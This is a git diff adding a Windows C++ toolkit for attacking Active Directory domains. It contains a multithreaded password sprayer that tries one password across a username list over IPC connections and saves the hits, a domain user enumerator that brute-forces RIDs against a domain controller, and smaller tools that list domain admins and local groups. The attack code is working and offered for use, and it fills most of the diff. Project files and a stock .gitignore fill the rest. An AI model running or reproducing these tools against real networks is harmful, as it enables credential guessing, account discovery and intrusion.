+#include "WNetApi.h"
+#include "CommonApi.h"
+#include "tou.h"
+#include "queue"
+
+#define BUFFSIZE 1024
+
+// ȫֱ
+WNetApi theWNetApi;
+CommonApi theCommonApi;
+std::mutex mtx; // ߳
+HANDLE hSuccessFile = theCommonApi.CreateFileApi(L"success.txt"); // ļ
+std::queue domainUsersQueue; // ûĶ
+
+void start(int i, LPWSTR lpRemoteName, LPWSTR lpDomainUserPassword) {
+
+ std::wstring domainUserName;
+ LPCWSTR lpDomainUserName;
+
+ while (!domainUsersQueue.empty())
+ {
+ if (mtx.try_lock())
+ {
+ domainUserName = domainUsersQueue.front(); // ȡһ
+ domainUsersQueue.pop(); // ɾһ
+ }
+ mtx.unlock();
+ lpDomainUserName = domainUserName.data();
+ // wprintf(L"[#%d] %s\n", i, lpDomainUserName);
+
+ if (theWNetApi.WNetAddConnection2Api(lpRemoteName, (LPWSTR)lpDomainUserName, lpDomainUserPassword) == 1) // Ϊû
+ {
+ theWNetApi.WNetCancelConnection2Api(lpRemoteName);
+ theCommonApi.saveIPCok(hSuccessFile, lpRemoteName, (LPWSTR)lpDomainUserName, lpDomainUserPassword);
+ }
+ else if (GetLastError() == 1219)
+ {
+ // һûʹһûԴĶӡж˷ԴӣȻһΡ
+ wprintf(L"[%s] multiple connections. try again. \n", lpDomainUserName);
+ domainUsersQueue.push(domainUserName); // Ҫ±ƣ
+ Sleep(1000);
+ }
+ else if (GetLastError() == 1326) {
+ // û벻ȷ
+ wprintf(L"[%s] The user name or password is incorrect. \n", lpDomainUserName);
+ }
+ else
+ {
+ wprintf(L"[%s] error : %d\n", lpDomainUserName, GetLastError());
+ }
+
+ }
+
+}
+
+int wmain(int argc, wchar_t* argv[])
+{
+ setlocale(LC_ALL, ""); //
+ if (argc != 5) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s \\\\192.168.52.29 domainUser.txt password 100\n", argv[0]);
+ wprintf(L" %s \\\\IP ûֵ ԱƵ ߳Ŀ\n", argv[0]);
+ exit(1);
+ }
+
+ LPWSTR lpRemoteName = argv[1]; // \\192.168.52.29
+ LPWSTR lpDomainUserFileName = argv[2]; // ûֵ: domainUser.txt
+ LPWSTR lpDomainUserPassword = argv[3]; // û: 1qaz@WSX
+ std::wstring wszThreadNum = argv[4]; // ߳Ŀ: 10
+
+ wprintf(L"lpRemoteName: %s\n", lpRemoteName);
+ wprintf(L"lpDomainUserFileName: %s\n", lpDomainUserFileName);
+ wprintf(L"lpDomainUserPassword: %s\n", lpDomainUserPassword);
+ wprintf(L"lpThreadNum: %s\n", wszThreadNum.data());
+ wprintf(L"------------------------------------------------------\n");
+
+
+ int iThreadNum = std::stoi(wszThreadNum.data());
+
+ FILE* pFile;
+ CHAR str1[BUFFSIZE];
+ LPWSTR str2;
+
+ if ((pFile = fopen(theCommonApi.UnicodeToAnsi(lpDomainUserFileName), "rt")) == NULL)
+ {
+ printf("ļʧ\n");
+ exit(0);
+ }
+
+ while (fgets(str1, BUFFSIZE, pFile))
+ {
+ str2 = theCommonApi.AnsiToUnicode(strtok(str1, "\n")); // ɾз
+ domainUsersQueue.push(str2);
+ }
+
+ // رļ
+ fclose(pFile);
+
+
+ // ߳
+ std::thread* Threads = new std::thread[iThreadNum];
+ for (int i = 0; i < iThreadNum; i++) {
+ Threads[i] = std::thread(start, i, lpRemoteName, lpDomainUserPassword);
+ }
+ for (int i = 0; i < iThreadNum; i++) {
+ Threads[i].join();
+ }
+ delete[] Threads;
+
+
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnuDomainUser/.gitignore b/EnuDomainUser/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/EnuDomainUser/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/EnuDomainUser/EnuDomainUser.vcxproj b/EnuDomainUser/EnuDomainUser.vcxproj
new file mode 100644
index 0000000..0d8c2cb
--- /dev/null
+++ b/EnuDomainUser/EnuDomainUser.vcxproj
@@ -0,0 +1,147 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}
+ EnuDomainUser
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v110_xp
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/EnuDomainUser/EnuDomainUser.vcxproj.filters b/EnuDomainUser/EnuDomainUser.vcxproj.filters
new file mode 100644
index 0000000..2453f19
--- /dev/null
+++ b/EnuDomainUser/EnuDomainUser.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/EnuDomainUser/\346\272\220.cpp" "b/EnuDomainUser/\346\272\220.cpp"
new file mode 100644
index 0000000..f05041f
--- /dev/null
+++ "b/EnuDomainUser/\346\272\220.cpp"
@@ -0,0 +1,246 @@
+// £ûȨޣأУIPCӼöû
+#pragma once
+#ifndef UNICODE
+#define UNICODE
+#endif
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include //
+
+#define BUFFSIZE 1024
+
+std::mutex mtx;
+int StartSid;
+
+// ַָ
+std::wstring splitString(std::wstring strSrc, std::wstring pattern)
+{
+ std::wstring result;
+ // ַԽȡһ
+ std::wstring strcom = strSrc.append(pattern);
+ // wprintf(L"%s\n", strcom);
+ auto pos = strSrc.find(pattern);
+ auto len = strcom.size();
+
+ // wprintf(L"%d", std::wstring::npos);
+ while (pos != std::wstring::npos)
+ {
+ std::wstring coStr = strcom.substr(0, pos);
+
+ strcom = strcom.substr(pos + pattern.size(), len);
+ pos = strcom.find(pattern);
+
+ if (pos == -1)
+ {
+ break;
+ }
+ result.append(coStr);
+ result.append(L"-");
+ }
+
+ return result;
+}
+
+// ȡadministratorsid
+BOOL user2sid(LPCTSTR lpSystemName, LPCTSTR lpAccountName, PSID Sid)
+{
+ // LPCTSTR lpSystemName = lpSystemName; // TEXT("192.168.52.2");
+ // LPCTSTR lpAccountName = lpAccountName; // û TEXT("hack\\administrator");
+ PSID pSid = Sid;
+ DWORD cbSid = 1; // SidĴС
+
+ WCHAR ReferencedDomainName[BUFFSIZE];
+ ZeroMemory(ReferencedDomainName, BUFFSIZE);
+ DWORD cchReferencedDomainName = 1;
+
+ UCHAR buffer[4];
+ PSID_NAME_USE peUse = (PSID_NAME_USE)buffer; // ָPSID_NAME_USEֵָʾʻͣıָ
+
+ BOOL bRtnBool = TRUE;
+
+ // һִΪ˻ȡcbSidcchReferencedDomainNameֵ
+ bRtnBool = LookupAccountName(
+ lpSystemName, //
+ lpAccountName, // û
+ pSid,
+ (LPDWORD)&cbSid,
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse);
+ // wprintf(L"cbSid:%d\ncchReferencedDomainName:%d\n", cbSid, cchReferencedDomainName);
+
+ // ڶִǻȡpSidΪҪһcbSidcchReferencedDomainName
+ bRtnBool = LookupAccountName(
+ lpSystemName,
+ lpAccountName,
+ pSid,
+ (LPDWORD)&cbSid,
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse);
+
+ if (bRtnBool == TRUE)
+ {
+ return TRUE;
+ }
+ else
+ {
+ printf("Error : %d\n", GetLastError());
+ }
+ return FALSE;
+};
+
+// ͨsidû
+std::wstring sid2user(PSID Sid, LPCTSTR lpSystemName)
+{
+ // LPCTSTR lpSystemName = TEXT("192.168.3.142"); //
+ PSID pSid = Sid; // SID
+
+ WCHAR Name[BUFFSIZE]; // sidû
+ ZeroMemory(Name, BUFFSIZE); // ڴ
+ DWORD cchName = 1; // NameĻС
+
+ WCHAR ReferencedDomainName[BUFFSIZE];
+ ZeroMemory(ReferencedDomainName, BUFFSIZE); // ڴ
+ DWORD cchReferencedDomainName = 1; // ReferencedDomainNameĻС
+
+ UCHAR buffer[4];
+ PSID_NAME_USE peUse = (PSID_NAME_USE)buffer; // ָPSID_NAME_USEֵָʾʻͣıָ
+
+ BOOL bRtnBool = TRUE;
+ // һִΪ˻ȡcchNamecchReferencedDomainName
+ bRtnBool = LookupAccountSid(
+ lpSystemName,
+ pSid,
+ Name,
+ (LPDWORD)&cchName,
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse);
+
+ // wprintf(L"cchName:%d\cchReferencedDomainName:%d\n", cchName, cchReferencedDomainName);
+
+ // ڶִǻȡNameΪҪһcchNamecchReferencedDomainName
+ bRtnBool = LookupAccountSid(
+ lpSystemName, // name of local or remote computer
+ pSid, // security identifier
+ Name, // account name buffer
+ (LPDWORD)&cchName, // size of account name buffer
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse); // SID type
+
+
+ if (bRtnBool == TRUE)
+ {
+ std::wstring domainUser;
+ domainUser = (std::wstring)ReferencedDomainName + L"\\" + (std::wstring)Name;
+ // wprintf(L"%s\\%s\n", ReferencedDomainName, Name);
+ return domainUser;
+ }
+ else
+ {
+ // printf("error: %d\n", GetLastError());
+ return L"";
+ }
+
+
+};
+
+// ʼö
+void start(int i, std::wstring userSidPrefix, int iEndSid, LPCTSTR lpSystemName)
+{
+
+ while (StartSid <= iEndSid)
+ {
+ int num = 0;
+ if (mtx.try_lock()) //
+ {
+ num = StartSid;
+ ++StartSid;
+ mtx.unlock(); //
+ }
+
+ std::wstring domainUser;
+ PSID pSid2;
+ std::wstring a = std::to_wstring(num);
+ std::wstring userSid;
+ userSid = userSidPrefix + a; // ƴӳsid
+ // wprintf(L"%s\t", userSid.data());
+ ConvertStringSidToSid((LPCWSTR)userSid.data(), &pSid2); // ַתΪSid
+ domainUser = sid2user(pSid2, lpSystemName);
+
+ if (domainUser != L"")
+ {
+ wprintf(L"[%d] %s\n", num, domainUser.data());
+ }
+ delete pSid2;
+ // Sleep(2000);
+ }
+
+}
+
+int wmain(int argc, wchar_t* argv[])
+{
+ setlocale(LC_ALL, ""); //
+ if (argc != 6) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s \\\\192.168.52.2 hack\\administrator 1000 2000 100\n", argv[0]);
+ wprintf(L" %s \\\\IP \\û<Ĭadministrator> ʼSid ĩβSid ߳Ŀ\n", argv[0]);
+ exit(0);
+ }
+
+ LPCTSTR lpSystemName = argv[1]; // IP
+ LPCTSTR lpAccountName = argv[2]; // hack\\administrator
+ std::wstring wszStartSid = argv[3]; // ʼSid
+ std::wstring wszEndSid = argv[4]; // ĩβSid
+ std::wstring wszThreadNum = argv[5]; // ߳Ŀ
+ int iStartSid = std::stoi(wszStartSid.data());
+ int iEndSid = std::stoi(wszEndSid.data());
+ int iThreadNum = std::stoi(wszThreadNum.data());
+ wprintf(L"DC-IP: %s\n", lpSystemName);
+ wprintf(L"domainname\\username: %s\n", lpAccountName);
+ wprintf(L"start Sid: %d\n", iStartSid);
+ wprintf(L"end Sid: %d\n", iEndSid);
+ wprintf(L"t_num: %d\n", iThreadNum);
+ wprintf(L"------------------------------------------------------\n");
+
+ StartSid = iStartSid; // ȫֱ
+
+ PSID Sid;
+ UCHAR buffer1[2048];
+ Sid = buffer1;
+
+ if (!user2sid(lpSystemName, lpAccountName, Sid))
+ {
+ wprintf(L"user2sid error!");
+ exit(0);
+ };
+
+ LPWSTR sid;
+ ConvertSidToStringSid(Sid, &sid); // SidתΪַ
+ wprintf(L"%s sid: %s\n", lpAccountName, sid);
+
+ std::wstring userSidPrefix; // sidǰ S-1-5-21-675012476-827261145-2327888524-
+ userSidPrefix = splitString(sid, L"-");
+ wprintf(L"sid Prefix: %s\n", userSidPrefix);
+
+ wprintf(L"------------------------------------------------------\n");
+
+ std::thread* Threads = new std::thread[iThreadNum];
+ for (int i = 0; i < iThreadNum; i++)
+ Threads[i] = std::thread(start, i, userSidPrefix, iEndSid, lpSystemName);
+ for (int i = 0; i < iThreadNum; i++)
+ Threads[i].join();
+ delete[] Threads;
+
+ wprintf(L"EnuDomainUser End!\n");
+}
diff --git a/NetGroupGetUsers/NetGroupGetUsers.vcxproj b/NetGroupGetUsers/NetGroupGetUsers.vcxproj
new file mode 100644
index 0000000..308a650
--- /dev/null
+++ b/NetGroupGetUsers/NetGroupGetUsers.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}
+ NetGroupGetUsers
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetGroupGetUsers/NetGroupGetUsers.vcxproj.filters b/NetGroupGetUsers/NetGroupGetUsers.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetGroupGetUsers/NetGroupGetUsers.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetGroupGetUsers/\346\272\220.cpp" "b/NetGroupGetUsers/\346\272\220.cpp"
new file mode 100644
index 0000000..d1aa189
--- /dev/null
+++ "b/NetGroupGetUsers/\346\272\220.cpp"
@@ -0,0 +1,45 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "Netapi32.lib") // WinnetҪĶ̬ӿ
+
+#include
+#include
+#include
+
+int wmain(int argc, wchar_t* argv[])
+{
+ if (argc != 3)
+ {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s \"domain admins\" \\\\192.168.232.128", argv[0]);
+ exit(1);
+ }
+
+ wprintf(L"groupname: %s\n", argv[1]);
+ wprintf(L"servername: %s\n", argv[2]);
+ LPCWSTR servername = argv[2];
+ LPCWSTR groupname = argv[1];
+ DWORD dwLevel = 1;
+ GROUP_USERS_INFO_1* bufptr;
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH;
+ DWORD dwEntriesread;
+ DWORD dwTotalentries;
+ DWORD dwRetVul;
+
+ dwRetVul = NetGroupGetUsers(servername, groupname, dwLevel, (LPBYTE*)&bufptr, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+
+ wprintf(L"num: %d\n", dwEntriesread);
+
+ if (dwRetVul == NO_ERROR)
+ {
+ for (DWORD i = 0; i < dwEntriesread; i++)
+ {
+ wprintf(L"[%u] %s \n", i, bufptr[i].grui1_name);
+ }
+ }
+ else
+ {
+ wprintf(L"error : %u\nhttps://docs.microsoft.com/en-us/windows/win32/netmgmt/network-management-error-codes", dwRetVul);
+ }
+}
\ No newline at end of file
diff --git a/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj
new file mode 100644
index 0000000..0d01dfa
--- /dev/null
+++ b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {F34A8EA5-9242-45FE-B71D-89706302A481}
+ NetLocalGroupEnum
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj.filters b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetLocalGroupEnum/\346\272\220.cpp" "b/NetLocalGroupEnum/\346\272\220.cpp"
new file mode 100644
index 0000000..3cf0120
--- /dev/null
+++ "b/NetLocalGroupEnum/\346\272\220.cpp"
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Netapi32.lib")
+
+int wmain(int argc, wchar_t* argv[]) {
+ if (argc != 2) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s 192.168.232.128\n", argv[0]);
+ exit(1);
+ }
+
+ LPCWSTR servername = argv[1]; // ѾipcӵIP
+ LOCALGROUP_INFO_1* buff; // LOCALGROUP_MEMBERS_INFO_2ṹbuffŻȡϢ
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH; // ָݵѡȣֽΪλָMAX_PREFERRED_LENGTHúڴ
+ DWORD dwEntriesread; // ָһֵָ룬ֵʵöٵԪ
+ DWORD dwTotalentries;
+ NetLocalGroupEnum(servername, 1, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ for (DWORD i = 0; i < dwEntriesread; i++)
+ {
+ wprintf(L"%s\n", buff[i].lgrpi1_name);
+ }
+}
\ No newline at end of file
diff --git a/NetLocalGroupGetMembers/NetLocalGroupGetMembers.sln b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.sln
new file mode 100644
index 0000000..6c586e8
--- /dev/null
+++ b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.sln
@@ -0,0 +1,111 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30011.22
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetLocalGroupGetMembers", "NetLocalGroupGetMembers.vcxproj", "{66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetLocalGroupEnum", "..\NetLocalGroupEnum\NetLocalGroupEnum.vcxproj", "{F34A8EA5-9242-45FE-B71D-89706302A481}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetGroupGetUsers", "..\NetGroupGetUsers\NetGroupGetUsers.vcxproj", "{6A90FBC9-89AF-4284-B984-5C33DC1D1864}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NetUserEnum", "..\NetUserEnum\NetUserEnum.vcxproj", "{F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wnetaddconnection2a", "..\wnetaddconnection2a\wnetaddconnection2a.vcxproj", "{3220347A-637E-4881-8226-799160A983DB}"
+EndProject
